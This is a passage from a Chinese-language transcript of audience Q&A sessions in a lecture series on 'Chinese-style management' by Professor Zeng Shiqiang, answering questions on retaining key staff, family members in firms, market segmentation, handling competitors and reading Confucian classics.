【答】一般人都有怀疑,他讲得头头是道,让他来干个总经理试试看。像他那样讲的,他不相信。我是搞过企业,但是我不会长久。我是师范大学毕业的,师范大学是一定要去教书的,我教了一年书,我就去当兵,台湾是每个人都要当兵的。我去当兵当了一年半,我当兵的时候,其实没什么事做,就开始想,想我退役以后干什么?当时就决定退役以后不教书了。退役发后,做了一年的生意,那个老板很好(是我父亲的朋友,自然会对曾仕强好的),样样让我试。我这个不喜欢做就换那个,什么都做过,所以,我就跟老板讲,我不做生意了。老板问,“为什么?”我说,“我一年下来,只有一个心得,那就是以我的个性,不适合作生意。”所以,我就又回学校教书。

 

因此,我是鼓励年轻人,去试一试看,怕什么?一年半载在你人生当中起不了多大作用。年轻是没有包袱的,年纪大了你经不起,那时候,你有家庭有小孩。所以,要试要趁年轻,很多事情你没有试过,你真的不知道。从事企业要有三个条件,一个要眼睛很准,那个目标市场,一看就看的出来;一个要脚步要稳,稳扎稳打;还有一个要狠。狠有两种,一种叫做无情无义的狠,将来就会很惨的;一种叫做有情有义的狠。成功的老板,都是有情有义的狠。

 

11、【问】美国的人际关系管理不如中国,有那么多的国际商业帝国,而中国现在还没有,为什么?我们应该怎么做才能复兴华夏商业中庸之国的地位?

 

【答】我只有三个字,不要急。急什么呢。 风水是轮流转的,我们刚刚才起来,人家已经快要下去了。风水轮流转,转世界一圈七百年。19世纪是英国人的世纪,全世界都是英国的殖民地,他的国旗日不落。20世纪是美国人的世纪,美国人称霸全球。21世纪是中国人的世纪。

 

12、【问】向公司的中层干部和基层员工,传播中国式管理的思想时,内容和方法是否应该有区别,区别在哪里?

 

【答】这个问题在中国很普遍。我们学到一样东西,生怕别人知道。以前中国人坏就坏在,我有秘笈,我有秘方,只有我知道你不知道,我可以耍你。我不主张这样的。我们主张知已知彼。基层学了之后,可以了解高层在想什么。高层不能完全让你了解,但是最起码他几个原则要让你知道。

 

一个人,先讲儒家,再讲道家,会比较扎实;一开始年纪轻轻就讲道家,恐怕不是很扎实。所以要以儒家为主道家为辅、儒家为主法家为辅、儒家为主墨家为辅。

 

 

 
 
第八讲 现场问答(下)

1、【问】企业的重要人物要辞职,作为老板该怎么办?明知留不住,老板应该如何表现的更大气一些?

 

【答】其实,如果他真的是重要人物,当他跟你要辞职的时候,你应该很坚决的表示,“我不接受。你跟我谈任何事情,我都跟你谈。唯独谈这件事,不要谈。”他如果坚持要辞职,就可以采取下面的办法。一般情况下,一个重要人物要辞职,一定是有对公司不满的地方。总经理可以让他在黑板或者白板上,写(一般是不好意思用嘴巴讲的)出自己对公司的意见,总经理负责对每条意见进行解释,如果要辞职的重要人物觉得总经理的答复还不错,一般的,是不好意思再提辞职了。

 

但是,如果一个重要人物要辞职,而且讲得比较清楚的时候,他大概是留不住了。因此,如果要留人,特别是留那些重要人物,是要在他还没有表态之前留。

 

2、【问】我在公司是第二把手,我的第一把手在会议上常常讲要按原则办事,但在实际的工作中,却是一个没有原则的人,我该怎么办?

 

【答】我相信他不是一个没有原则的人,他只是不按规定办事,他的原则就是不按规定办事。在中国,制度是让基层去守,不是让高层去守。如果从上到下都按制度做,就僵化绑死了;如果从上到下都不按照制度做,就天下大乱了。中国人有句很难听的话,只许州官放火,不许百姓点灯。层级高的人他有更大的弹性,层级低的人是没有弹性。高阶层是不按照规定到合理的地步,基层是不按照规定到合理的地步。

 

3、【问】公司在刚成立的时候,为避免家庭企业可能出现的问题,就没有用家庭的成员。现在企业大一些了,公司的人也多了,关系也复杂了,还是觉得有几个家庭成员要放心一些,您说这样做对吗?

 

【答】其实,一开始让家里的人不进来,是不公平的。但现在再引进家族的人,也是不妥当的。你引进家族的人,是什么动机?是监视其他的人?那大家完全不信任了。

 

如果是我的话,我会优先考虑自己人,能用,自然就用了;不能用,你再自己人我也不用。一开始不要问是不是自己人,而应该问能用不能用。而且能用,自己用优先。因此,应该把能用不能用作为标准。

 

4、【问】如何打造自己的差异性?

 

【答】这个用管理的名词来讲,叫市场区隔。市场很大,千万不要大小通吃。你野心太大,想大小通吃,就会引起同业一致的攻击,因为他不把你打倒的话,他不能活。我们市场很大,我只吃这一块,那一块我不吃,留给别人吃,我能够把自己吃掉的一块吃好了就够了。

 

5、【问】我认为中国的人际关系不利于当今企业创新发展,因为同志同道的关系,这样说是否对,请曾老师指点。

 

【答】我觉得董事长和总经理的理念会影响整个公司的发展。如果在公司里面不讲人情,我们一切照规定办,也可以成功的。但是,过段时间之后,人家对你的评价,可能会比较糟糕。记住:赚钱永远不是唯一的目标。赚钱有两种后果,一种赚的人家背后一直诅咒你,一种是人家背后感谢你。我们做生意应该是往长处想。

 

6、【问】做为企业的领导人做人最重要,请您为企业的老总推荐几本加强自己品格、道德修养的书。

 

【答】做为一个中国人,第一本要读的书是《论语》。先读《论语》再说。日本人经济发达,是因为他们读《论语》。日本有本书,叫《论语与算盘》,在日本非常轰动,一方面看《论语》,一方面打算盘,就是义利兼顾。论语里没有什么新奇的道理,里面讲的道理是非常平凡的。我以为,真正的道理是很平常的,不是那种听起来好像很好听。最伟大的是很平凡的,真正伟大的人是很平凡的,最真的东西是很平常的,最好吃的东西是很平淡的。《论语》中开篇三句话很重要。

 

看完《论语》再看《孟子》。《孟子》看完,再看《大学》;《大学》看完,最后你才有办法看懂《中庸》。《道德经》应该放在后面看,你用一般的眼光去看他,经常会看错。

 

7、【问】在企业日常经营管理中,如何理解有话直说、有话实说、目无尊长,这样有利于暴露问题、解决问题吗?

 

【答】有话直说、有话实说,对方往往受不了,有情绪化的反应。因此,我们都喜欢有话直说、有话实说,不要拐弯抹角,但是当人家这样对付你的时候,没有一个人受的了。你明明知道他讲的很对,但你就是受不了,那你有什么办法呢?当人家说中你的心思的时候,你会受不了的。

 

8、【问】我们聘请了一位总经理,这个总经理很能干,也很有能力,但是大事小事骂手下的干部,这该如何解决?

 

【答】有两种情况,一是董事长大小事情都骂手下干部;二是上面董事长不骂,他骂就是做给上面看的,他说,你看你不管,逼得我要这么做。因此,要根据不同的情况找原因,然后才有办法对症下药。

 

9、【问】您向儿女推学中国式管理吗?如果是为什么要送儿女到外国去?

 

【答】我的小孩子统统上过我的课,没有一个不上我的课,但是我并没有希望他们传承我的课,因为人各有志。我的小孩去美国读书,是一种不得已的事情。因为我在大陆,被人家看成是台湾人,实际上我是大陆人,我是福建人;福建人在台湾是被看成是外省人。在台湾,外省人的第二代是完全没有前途的。所以,如果你了解真相的话,你就会觉得,曾教授是值得同情的。

 

10、【问】同行业的老板害怕我的公司走过他,想方设法阻止我企业的发展,应该如何对付他?

 

【答】我一直建议大家,一件事情发生,如果你把它看成是坏事情,那就真的成了坏事情;你把它看成是好事情,他会慢慢演变成好事情。一个人,完全没有敌人,不见得好,因为别人看不上你,完全看不上你(记住:当人家不把你当对手的时候,你是完全不存在的)。孟子云,生于忧患,死于安乐。一家公司没有忧患,他是不会安乐的。完全没有竞争对手的公司,时间一长,就会出现很多问题。

 

三个建议,第一:不要抱怨。第二:有人攻击你,你就看别人攻击你哪里,如果攻击到你的弱点,你要很高兴。如果攻击的不是你的弱点,你也很高兴,原来我的弱点你搞了半天还没有找到。第三:很冷静的去了解事情的原因,采取一定的对策。

 

11、【问】听完您的课,我们感觉很实用,也符合中国的儒家思想和老百姓的习惯,但是人的追求是不一样的,观点也不一样,所以追求有很大的差异性,有的人认为快乐就是人生,有的人认为可能成功是一种乐趣,但如果按照您说的来做感觉是不是太累了,请您指点迷津。

 

【答】人生哲学发展到最高境界就要考虑这些问题。我们都知道人要快乐,但你再问他什么叫快乐,他就答不出来。我们的差异性是差异在快乐的定义不一样,有人认为天天赚钱是快乐,有人认为天天去赚钱最不快乐。中国有句话叫,活着不耐烦了。活着不耐烦就完了。因此,活着就要耐烦,一个人活着就要耐烦。我希望各位记住一句话,习惯成自然。